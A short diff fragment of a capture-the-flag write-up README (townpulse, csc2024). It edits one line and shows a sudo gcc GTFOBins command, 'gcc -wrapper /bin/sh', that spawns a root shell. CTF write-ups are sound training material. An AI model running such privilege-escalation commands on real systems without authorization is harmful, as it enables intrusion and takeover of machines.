woprd/ctfs/csa/csc2024/townpulse/README.md

 Interesting this one, as the commands are limited to those Joan had.
 Wasn't expecting that.

-Run that GTFOBin again with our account.
+Run that GTFOBin again with our account

 ```bash
 Pentester@host:~$ sudo gcc -wrapper /bin/sh,-s .